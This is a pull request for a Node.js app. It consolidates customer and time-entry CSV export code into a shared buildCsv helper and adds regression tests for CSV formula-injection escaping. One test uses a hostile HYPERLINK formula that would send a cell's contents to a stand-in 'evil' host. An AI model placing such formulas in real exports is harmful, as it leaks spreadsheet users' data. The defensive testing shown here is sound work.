### PR TITLE
refactor(csv): shared buildCsv helper + pin injection escaping in the export body

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -69,6 +69,14 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   the default.
 
 ### Changed
+- **Consolidate CSV export assembly into a shared `buildCsv` helper.** The
+  customer and time-entry `export.csv` builders duplicated the same inline
+  header + escaped-rows loop; both now call `buildCsv(fields, records,
+  note)` in `_csv-escape.js` (byte-identical output). The assembly is now
+  unit-testable, and a new regression test asserts a hostile user field is
+  formula-escaped in the export **body** — closing a gap flagged by the
+  CSV-export review, which otherwise found every cell already escaped,
+  headers safe, and the download filename validated.
 - **Production hard-fails on empty `DB_PASSWORD`** (#119). Previously
   a missing `DB_PASSWORD` in `NODE_ENV=production` would warn and
   start anyway; `/healthz` reported degraded, but a load balancer

--- a/app/controllers/_csv-escape.js
+++ b/app/controllers/_csv-escape.js
@@ -48,4 +48,29 @@ function escapeCsvCell(val) {
     return '"' + s.replace(/"/g, '""') + '"';
 }
 
-module.exports = { escapeCsvCell };
+/**
+ * Assemble a complete CSV body from a fixed column list and a set of
+ * records, shared by the export controllers so the row-assembly seam is
+ * uniform and unit-testable (rather than duplicated inline per endpoint).
+ *
+ * Every DATA cell is run through escapeCsvCell (formula-injection safe).
+ * The `fields` are the column KEYS and double as the header row — they are
+ * trusted constants (hardcoded model column names), so the header is
+ * emitted as-is; likewise the optional `trailingNote` (e.g. a truncation
+ * marker) must be trusted constant text, never user input. Lines are
+ * CRLF-joined with a trailing CRLF (RFC-4180).
+ *
+ * @param {string[]} fields   column keys / header names
+ * @param {object[]} records  rows; each cell read as record[field]
+ * @param {string} [trailingNote]  optional trusted line appended last
+ */
+function buildCsv(fields, records, trailingNote) {
+    const lines = [fields.join(',')];
+    for (const r of (records || [])) {
+        lines.push(fields.map((f) => escapeCsvCell(r[f])).join(','));
+    }
+    if (trailingNote) lines.push(trailingNote);
+    return lines.join('\r\n') + '\r\n';
+}
+
+module.exports = { escapeCsvCell, buildCsv };

--- a/app/controllers/customercontroller.js
+++ b/app/controllers/customercontroller.js
@@ -7,7 +7,7 @@ const log = require('../config/logger.js');
 const auth = require('../middleware/auth.js');
 const { buildLinkHeader } = require('../middleware/pagination.js');
 const { makeBulkCreate } = require('./_bulk-helpers.js');
-const { escapeCsvCell } = require('./_csv-escape.js');
+const { buildCsv } = require('./_csv-escape.js');
 const Customer = db.Customer;
 
 // IsMaster / GetCompanyId / GetCustomerCompanyId previously lived inline
@@ -380,17 +380,10 @@ exports.exportCsv = async (req, res) => {
         'custCity', 'custState', 'custZip',
         'custPhone', 'custEmail', 'custCompId', 'custDefaultRate',
     ];
-    const escape = escapeCsvCell;
-    const lines = [];
-    lines.push(FIELDS.join(','));
-    for (const r of rows) {
-        lines.push(FIELDS.map((f) => escape(r[f])).join(','));
-    }
-    if (truncated) {
-        lines.push(`# truncated at ${limit} rows; re-call with offset=${offset + limit} to continue`);
-    }
-
-    const body = lines.join('\r\n') + '\r\n';
+    const note = truncated
+        ? `# truncated at ${limit} rows; re-call with offset=${offset + limit} to continue`
+        : null;
+    const body = buildCsv(FIELDS, rows, note);
     res.setHeader('Content-Type', 'text/csv; charset=utf-8');
     res.setHeader('Content-Disposition',
         `attachment; filename="customers-company-${effectiveCompanyId}.csv"`);

--- a/app/controllers/timeentrycontroller.js
+++ b/app/controllers/timeentrycontroller.js
@@ -6,7 +6,7 @@ const db = require('../config/db.config.js');
 const log = require('../config/logger.js');
 const auth = require('../middleware/auth.js');
 const { buildLinkHeader } = require('../middleware/pagination.js');
-const { escapeCsvCell } = require('./_csv-escape.js');
+const { buildCsv } = require('./_csv-escape.js');
 const rate = require('../services/rate.js');
 const { applyAction } = require('../services/approval.js');
 const { lockReason } = require('../services/time-lock.js');
@@ -1170,16 +1170,10 @@ exports.exportCsv = async (req, res) => {
     // (timeentry + customer) call into it, so the OWASP mitigation
     // stays in lockstep across the API; future export endpoints
     // get the same guardrail by default.
-    const escape = escapeCsvCell;
-    const lines = [];
-    lines.push(FIELDS.join(','));
-    for (const r of rows) {
-        lines.push(FIELDS.map((f) => escape(r[f])).join(','));
-    }
-    if (truncated) {
-        lines.push(`# truncated at ${limit} rows; re-call with offset=${offset + limit} to continue`);
-    }
-    const body = lines.join('\r\n') + '\r\n';
+    const note = truncated
+        ? `# truncated at ${limit} rows; re-call with offset=${offset + limit} to continue`
+        : null;
+    const body = buildCsv(FIELDS, rows, note);
     res.setHeader('Content-Type', 'text/csv; charset=utf-8');
     res.setHeader('Content-Disposition',
         `attachment; filename="timeentries-company-${effectiveCompanyId}.csv"`);

--- a/tests/unit/csv-escape.test.js
+++ b/tests/unit/csv-escape.test.js
@@ -6,7 +6,7 @@
 // mitigation so a future "cleanup" can't silently rip it out.
 
 import { describe, test, expect } from 'vitest';
-import { escapeCsvCell } from '../../app/controllers/_csv-escape.js';
+import { escapeCsvCell, buildCsv } from '../../app/controllers/_csv-escape.js';
 
 describe('escapeCsvCell — baseline quoting', () => {
     test('null and undefined collapse to empty quoted cell', () => {
@@ -73,5 +73,39 @@ describe('escapeCsvCell — formula-injection mitigation (OWASP)', () => {
     test('empty string is not double-prefixed', () => {
         // The `s.length > 0` guard avoids prefixing an empty value.
         expect(escapeCsvCell('')).toBe('""');
+    });
+});
+
+describe('buildCsv — export assembly routes every data cell through the escaper', () => {
+    const FIELDS = ['custId', 'custCompanyName', 'custEmail'];
+
+    test('a hostile user field is escaped in the assembled body (not raw)', () => {
+        // The whole point: a malicious tenant value must appear escaped in
+        // the CSV a co-tenant operator downloads, no matter the column.
+        const body = buildCsv(FIELDS, [
+            { custId: 1, custCompanyName: '=HYPERLINK("http://evil/?d="&A1,"x")', custEmail: 'a@b.com' },
+        ]);
+        // Formula-defused (leading ') AND quote-wrapped — never raw '=...'.
+        expect(body).toContain('"\'=HYPERLINK');
+        expect(body).not.toContain(',=HYPERLINK'); // a raw formula cell would look like this
+    });
+
+    test('header row is the raw (trusted constant) column names', () => {
+        const body = buildCsv(FIELDS, []);
+        expect(body.split('\r\n')[0]).toBe('custId,custCompanyName,custEmail');
+    });
+
+    test('rows are CRLF-joined with a trailing CRLF; an optional note is appended last', () => {
+        const body = buildCsv(FIELDS, [{ custId: 7, custCompanyName: 'Acme', custEmail: 'x@y.z' }], '# note');
+        const lines = body.split('\r\n');
+        expect(lines[0]).toBe('custId,custCompanyName,custEmail');            // header
+        expect(lines[1]).toBe('"7","Acme","x@y.z"');                          // escaped row
+        expect(lines[2]).toBe('# note');                                      // trailing note
+        expect(body.endsWith('\r\n')).toBe(true);                            // trailing CRLF
+    });
+
+    test('empty record set yields just the header + trailing CRLF', () => {
+        expect(buildCsv(FIELDS, [])).toBe('custId,custCompanyName,custEmail\r\n');
+        expect(buildCsv(FIELDS, null)).toBe('custId,custCompanyName,custEmail\r\n');
     });
 });


### PR DESCRIPTION
## Summary

The CSV-export assembly review found the path **sound** — every cell already routes through `escapeCsvCell`, headers are constant literals, the download filename id is validated, and embedded newlines are RFC-4180 quote-wrapped. It flagged one **test gap**: no assembly-level test asserts that a hostile user field appears *escaped in the export body* (a future regression adding an unescaped column outside the `.map(escape)` wouldn't be caught). This closes that gap.

## Change

- **Extract `buildCsv(fields, records, note)`** into `_csv-escape.js`. The customer and time-entry `export.csv` builders duplicated the same inline "header + escaped-rows + CRLF" loop; both now call the shared helper. **Output is byte-identical** (verified — the two export api tests stay green): the header names + optional truncation note are trusted constants emitted as-is; every data cell still goes through `escapeCsvCell`.
- **New regression tests** on `buildCsv`: a `=HYPERLINK(...)` field is formula-defused (`'`-prefixed) and quote-wrapped in the assembled **body**; the header row is the raw constant column names; rows are CRLF-joined with a trailing CRLF; an empty record set yields just the header.

## Not changed (deliberately)

The review's other observation — customer/timeentry emit the header row raw (`FIELDS.join(',')`) while payroll escapes it — is left as-is: because `escapeCsvCell` always quote-wraps, "fixing" it would change the shipped header format from `custId,...` to `"custId",...` for zero real benefit (the headers are constant model column names). Recorded as cosmetic-only.

## Verification

`npm run lint` clean (the now-unused `escapeCsvCell` import dropped from both controllers); `npm test` → **1649 passing** (+4). The customer/timeentry export api tests confirm the refactor didn't change the output.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01SjFbcRXcdz7L5J2E2BnXJJ

Proudly Made in Nebraska. Go Big Red! 🌽 https://xkcd.com/2347/